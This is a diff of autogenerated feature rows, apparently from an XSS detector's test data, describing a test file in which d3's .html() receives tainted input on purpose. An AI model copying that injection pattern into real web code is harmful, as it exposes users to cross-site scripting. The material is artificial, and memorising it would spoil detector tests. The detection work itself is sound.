contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | functio ... OT OK\\n} | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | return of function doSomething | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | return of function doSomething | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | return of function doSomething | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | return of function doSomething | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | return of function doSomething | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:10:7:20 | doSomething | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:10:7:20 | doSomething | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:7:10:7:20 | doSomething | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:6 | d3 | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:6 | d3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:6 | d3 | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:6 | d3 | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:6 | d3 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:13 | d3.select | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:13 | d3.select | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:13 | d3.select | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:13 | d3.select | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:13 | d3.select | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | d3.select('#main') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | d3.select('#main') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | d3.select('#main') | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | d3.select('#main') | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | d3.select('#main') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | exceptional return of d3.select('#main') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | exceptional return of d3.select('#main') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | exceptional return of d3.select('#main') | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | exceptional return of d3.select('#main') | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:8:22 | exceptional return of d3.select('#main') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:13 | d3.sele ... .attr | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:13 | d3.sele ... .attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:13 | d3.sele ... .attr | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:13 | d3.sele ... .attr | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:13 | d3.sele ... .attr | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | d3.sele ... ', 100) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | d3.sele ... ', 100) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | d3.sele ... ', 100) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | d3.sele ... ', 100) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | d3.sele ... ', 100) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | exceptional return of d3.sele ... ', 100) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | exceptional return of d3.sele ... ', 100) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | exceptional return of d3.sele ... ', 100) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | exceptional return of d3.sele ... ', 100) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:9:27 | exceptional return of d3.sele ... ', 100) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:14 | d3.sele ... .style | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:14 | d3.sele ... .style | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:14 | d3.sele ... .style | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:14 | d3.sele ... .style | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:14 | d3.sele ... .style | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | d3.sele ... 'red') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | d3.sele ... 'red') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | d3.sele ... 'red') | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | d3.sele ... 'red') | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | d3.sele ... 'red') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | exceptional return of d3.sele ... 'red') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | exceptional return of d3.sele ... 'red') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | exceptional return of d3.sele ... 'red') | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | exceptional return of d3.sele ... 'red') | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:10:30 | exceptional return of d3.sele ... 'red') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:13 | d3.sele ... .html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:13 | d3.sele ... .html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:13 | d3.sele ... .html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:13 | d3.sele ... .html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:13 | d3.sele ... .html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | d3.sele ... aint()) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | exceptional return of d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | exceptional return of d3.sele ... aint()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | exceptional return of d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | exceptional return of d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:11:25 | exceptional return of d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:13 | d3.sele ... .html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:13 | d3.sele ... .html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:13 | d3.sele ... .html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:13 | d3.sele ... .html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:13 | d3.sele ... .html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | d3.sele ... aint()) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | exceptional return of d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | exceptional return of d3.sele ... aint()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | exceptional return of d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | exceptional return of d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:12:30 | exceptional return of d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:13 | d3.sele ... .call | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:13 | d3.sele ... .call | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:13 | d3.sele ... .call | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:13 | d3.sele ... .call | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:13 | d3.sele ... .call | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | d3.sele ... nction) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | d3.sele ... nction) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | d3.sele ... nction) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | d3.sele ... nction) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | d3.sele ... nction) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | exceptional return of d3.sele ... nction) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | exceptional return of d3.sele ... nction) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | exceptional return of d3.sele ... nction) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | exceptional return of d3.sele ... nction) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | exceptional return of d3.sele ... nction) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | reflective call | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | reflective call | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | reflective call | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | reflective call | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:13:28 | reflective call | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:13 | d3.sele ... .html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:13 | d3.sele ... .html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:13 | d3.sele ... .html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:13 | d3.sele ... .html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:13 | d3.sele ... .html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | d3.sele ... aint()) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | exceptional return of d3.sele ... aint()) | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | exceptional return of d3.sele ... aint()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | exceptional return of d3.sele ... aint()) | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | exceptional return of d3.sele ... aint()) | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:5:14:30 | exceptional return of d3.sele ... aint()) | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:8:8:8:13 | select | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:8:8:8:13 | select | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:8:8:8:13 | select | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:8:8:8:13 | select | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:8:8:8:13 | select | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | CalleeFlexibleAccessPath | d3.select | | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | calleeImports | d3 | @@ -12743,6 +95924,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:8:15:8:21 | '#main' | receiverName | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:9:10:9:13 | attr | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:9:10:9:13 | attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:9:10:9:13 | attr | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:9:10:9:13 | attr | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:9:10:9:13 | attr | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:9:15:9:21 | 'width' | CalleeFlexibleAccessPath | d3.select().attr | | autogenerated/Xss/DomBasedXss/d3.js:9:15:9:21 | 'width' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:9:15:9:21 | 'width' | calleeImports | d3 | @@ -12759,6 +95945,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:9:24:9:26 | 100 | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:9:24:9:26 | 100 | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:9:24:9:26 | 100 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:10:10:10:14 | style | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:10:10:10:14 | style | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:10:10:10:14 | style | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:10:10:10:14 | style | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:10:10:10:14 | style | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:10:16:10:22 | 'color' | CalleeFlexibleAccessPath | d3.select().attr().style | | autogenerated/Xss/DomBasedXss/d3.js:10:16:10:22 | 'color' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:10:16:10:22 | 'color' | calleeImports | d3 | @@ -12775,6 +95966,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:10:25:10:29 | 'red' | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:10:25:10:29 | 'red' | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:10:25:10:29 | 'red' | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:11:10:11:13 | html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:11:10:11:13 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:11:10:11:13 | html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:11:10:11:13 | html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:11:10:11:13 | html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:22 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:22 | getTaint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:22 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:22 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:22 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | exceptional return of getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | exceptional return of getTaint() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | exceptional return of getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | exceptional return of getTaint() | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | exceptional return of getTaint() | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | CalleeFlexibleAccessPath | d3.select().attr().style().html | | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | calleeImports | d3 | @@ -12783,6 +95989,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:11:15:11:24 | getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:10:12:13 | html | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:10:12:13 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:12:10:12:13 | html | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:10:12:13 | html | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:10:12:13 | html | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:14 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:14 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:14 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:14 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:14 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:15 | d | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:15 | d | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:15 | d | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:15 | d | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:15 | d | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | 'arguments' object of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | 'arguments' object of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | 'arguments' object of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | 'arguments' object of anonymous function | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | CalleeFlexibleAccessPath | d3.select().attr().style().html().html | | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | calleeImports | d3 | @@ -12791,6 +96017,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | enclosingFunctionName | doSomething | | autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | d => getTaint() | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | exceptional return of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | exceptional return of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | exceptional return of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | exceptional return of anonymous function | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | return of anonymous function | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | return of anonymous function | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | return of anonymous function | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:15:12:29 | return of anonymous function | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:27 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:27 | getTaint | contextSurroundingFunctionParameters | ()\n(d) | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:27 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:27 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:27 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:12:20:12:29 | exceptional return of getTaint() | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| 